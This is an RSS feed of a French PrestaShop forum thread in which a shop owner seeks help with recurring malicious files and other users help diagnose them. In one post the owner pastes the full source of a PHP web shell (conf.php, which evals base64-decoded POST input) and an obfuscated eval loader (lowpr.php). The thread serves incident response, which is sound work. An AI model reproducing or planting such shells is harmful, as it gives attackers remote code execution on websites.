<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Nouvelle attaque ?]]></title><description><![CDATA[<p dir="auto">Bonjour à tous,</p>
<p dir="auto">Je constate sur mon presta certaines modifications anormales, en tout cas non souhaitées qui me laisse penser à une attaque.<br />
Voici en quelques mots ce que j'ai pu observer :<br />
Modification du htaccess<br />
Creation de fichiers 1.mcm.x86_64, confcom.php, conf.php, lowpr.php,...<br />
Malgré la suppression des fichiers indésirables et le rétablissement du htaccess, cela revient régulièrement.<br />
J'ai passé le scan de sécurité cleaner.php de <a class="plugin-mentions-user plugin-mentions-a" href="/user/eolia" aria-label="Profile: eolia">@<bdi>eolia</bdi></a> qui ne détecte pas de virus.<br />
Quelqu'un a-t-il été confronté à cela auparavant ? Et si oui, quelles sont les actions à mener ?</p>
<p dir="auto">Merci pour vos réponses.</p>
]]></description><link>https://bb.enter-solutions.net/topic/1145/nouvelle-attaque</link><generator>RSS for Node</generator><lastBuildDate>Wed, 10 Jun 2026 06:59:02 GMT</lastBuildDate><atom:link href="https://bb.enter-solutions.net/topic/1145.rss" rel="self" type="application/rss+xml"/><pubDate>Mon, 20 Nov 2023 10:36:54 GMT</pubDate><ttl>60</ttl><item><title><![CDATA[Reply to Nouvelle attaque ? on Mon, 28 Oct 2024 20:15:25 GMT]]></title><description><![CDATA[<p dir="auto"><a class="plugin-mentions-user plugin-mentions-a" href="/user/rpro" aria-label="Profile: RPro">@<bdi>RPro</bdi></a> a dit dans <a href="/post/1533">Nouvelle attaque ?</a> :</p>
<blockquote>
<p dir="auto">eval/Designed with utility, safety and style/($table_prefix($wp_content));</p>
</blockquote>
<p dir="auto">Cela ressemble pas mal à une attaque pour wordpress.</p>
]]></description><link>https://bb.enter-solutions.net/post/2080</link><guid isPermaLink="true">https://bb.enter-solutions.net/post/2080</guid><dc:creator><![CDATA[herve_02]]></dc:creator><pubDate>Mon, 28 Oct 2024 20:15:25 GMT</pubDate></item><item><title><![CDATA[Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 19:40:43 GMT]]></title><description><![CDATA[<p dir="auto">Par contre il faut comprendre les limites du système.<br />
La version 1.7 c'est plus d'un million de lignes de code (contre 300 000 pour les 1.6) et cleaner ne peut pas scanner tous les fichiers/répertoires surtout que j'ai arrêté de suivre leurs évolutions.<br />
Un autre élément à contrôler: pas d'autres CMS sur le même hébergement (WordPress ou autre) ni de répertoires inconnus (créés par vous et non-scannés) ?</p>
]]></description><link>https://bb.enter-solutions.net/post/1538</link><guid isPermaLink="true">https://bb.enter-solutions.net/post/1538</guid><dc:creator><![CDATA[eolia]]></dc:creator><pubDate>Mon, 20 Nov 2023 19:40:43 GMT</pubDate></item><item><title><![CDATA[Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 19:37:15 GMT]]></title><description><![CDATA[<p dir="auto">J'ai oublié : j'ai passé cleaner.php après avoir supprimé les fichiers ...<br />
Cela ne change rien dans les faits car ils reviennent ce qui signifie que l'infection vient d'un autre fichier ou d'une faille qui, lui /elle n'a pas été détecté ...</p>
]]></description><link>https://bb.enter-solutions.net/post/1537</link><guid isPermaLink="true">https://bb.enter-solutions.net/post/1537</guid><dc:creator><![CDATA[RPro]]></dc:creator><pubDate>Mon, 20 Nov 2023 19:37:15 GMT</pubDate></item><item><title><![CDATA[Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 18:46:55 GMT]]></title><description><![CDATA[<p dir="auto">Bah je ne comprends pas que Cleaner ne les trouve pas avec de telles fonctions à l'intérieur. (eval() par exemple)</p>
]]></description><link>https://bb.enter-solutions.net/post/1536</link><guid isPermaLink="true">https://bb.enter-solutions.net/post/1536</guid><dc:creator><![CDATA[eolia]]></dc:creator><pubDate>Mon, 20 Nov 2023 18:46:55 GMT</pubDate></item><item><title><![CDATA[Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:58:52 GMT]]></title><description><![CDATA[<p dir="auto">Le <strong>fichier 1.mcm.x86_64</strong> est trop long pour être transmis tel quel.<br />
Le <strong>fichier confcom.php</strong> est vide<br />
Le <strong>fichier conf.php</strong> est le suivant :<br />
&lt;!DOCTYPE html&gt;<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt;PHP command&lt;/title&gt;<br />
&lt;/head&gt;<br />
&lt;body&gt;<br />
&lt;form method="post" action=""&gt;<br />
&lt;input type="text" name="php" id="php"&gt;<br />
&lt;input type="submit" value="Execute"&gt;<br />
&lt;/form&gt;<br />
&lt;?php<br />
if ($_SERVER['REQUEST_METHOD'] === 'POST') {<br />
$php = $_POST['php'];	<br />
$php = strtr($php, '-', '=');<br />
$php = base64_decode($php);				<br />
if($php) {<br />
$result = eval($php);<br />
echo $result;<br />
}<br />
}<br />
?&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</p>
<p dir="auto">Le <strong>fichier lowpr.php</strong> est le suivant :<br />
&lt;?php<br />
$table_prefix = "wbzaxsye6w4_duevcwondme";<br />
$table_prefix = str_replace(array("z", "x", "y", "u", "v", "w", "n", "m"), "", $table_prefix);<br />
$txt_contents = "1f2i3l4e5_6g7e8t9_0c1o2n3t4e5n6t7s8";<br />
$txt_contents = preg_replace("/\d+/", "", $txt_contents);<br />
$wp_content = $txt_contents("lowpr".".txt");<br />
eval/<em>Designed with utility, safety and style</em>/($table_prefix($wp_content));<br />
?&gt;</p>
<p dir="auto">J'espère que cela vous donnera des idées car je suis pas compétent !<br />
Merci par avance</p>
]]></description><link>https://bb.enter-solutions.net/post/1533</link><guid isPermaLink="true">https://bb.enter-solutions.net/post/1533</guid><dc:creator><![CDATA[RPro]]></dc:creator><pubDate>Mon, 20 Nov 2023 16:58:52 GMT</pubDate></item><item><title><![CDATA[Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:50:47 GMT]]></title><description><![CDATA[<p dir="auto">il y a quoi dans les fichiers que vous avez supprimé ?</p>
]]></description><link>https://bb.enter-solutions.net/post/1532</link><guid isPermaLink="true">https://bb.enter-solutions.net/post/1532</guid><dc:creator><![CDATA[eolia]]></dc:creator><pubDate>Mon, 20 Nov 2023 16:50:47 GMT</pubDate></item><item><title><![CDATA[Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:49:10 GMT]]></title><description><![CDATA[<p dir="auto">Non !<br />
Il y a bien des alertes de modification mais après vérification, c'est normal.<br />
Aucune modification en rouge.</p>
]]></description><link>https://bb.enter-solutions.net/post/1531</link><guid isPermaLink="true">https://bb.enter-solutions.net/post/1531</guid><dc:creator><![CDATA[RPro]]></dc:creator><pubDate>Mon, 20 Nov 2023 16:49:10 GMT</pubDate></item><item><title><![CDATA[Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:46:48 GMT]]></title><description><![CDATA[<p dir="auto">Avant que vous ne supprimiez quoi que ce soit, Cleaner ne trouve rien ?</p>
]]></description><link>https://bb.enter-solutions.net/post/1530</link><guid isPermaLink="true">https://bb.enter-solutions.net/post/1530</guid><dc:creator><![CDATA[eolia]]></dc:creator><pubDate>Mon, 20 Nov 2023 16:46:48 GMT</pubDate></item><item><title><![CDATA[Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:04:13 GMT]]></title><description><![CDATA[<p dir="auto">Désolé pour l'oubli : il s'agit de 1.7.2.4</p>
]]></description><link>https://bb.enter-solutions.net/post/1529</link><guid isPermaLink="true">https://bb.enter-solutions.net/post/1529</guid><dc:creator><![CDATA[RPro]]></dc:creator><pubDate>Mon, 20 Nov 2023 16:04:13 GMT</pubDate></item><item><title><![CDATA[Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:02:24 GMT]]></title><description><![CDATA[<p dir="auto">Quelle version de Presta ?</p>
]]></description><link>https://bb.enter-solutions.net/post/1528</link><guid isPermaLink="true">https://bb.enter-solutions.net/post/1528</guid><dc:creator><![CDATA[eolia]]></dc:creator><pubDate>Mon, 20 Nov 2023 16:02:24 GMT</pubDate></item></channel></rss>